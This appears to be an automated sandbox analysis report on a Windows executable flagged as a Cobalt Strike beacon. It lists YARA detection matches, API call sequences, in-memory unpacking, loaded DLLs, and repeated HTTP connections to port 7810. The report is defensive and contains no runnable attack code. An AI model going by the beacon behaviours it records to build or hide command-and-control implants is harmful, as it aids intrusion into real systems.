Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00670B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_00670B70

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_00673A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,

0_2_00673A64

Source: P3KxDOMmD3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: P3KxDOMmD3.exe

ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Unpacked PE file: 0.2.P3KxDOMmD3.exe.660000.2.unpack

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe

Code function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0066D83C

Source: P3KxDOMmD3.exe

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_001D776C push 0000006Ah; retf		0_2_001D7784
Source: C:\Users\user\Desktop\P3KxDOMmD3.exe	Code function: 0_2_0069916C push 0000006Ah; retf		0_2_00699184

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 7810
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 7810
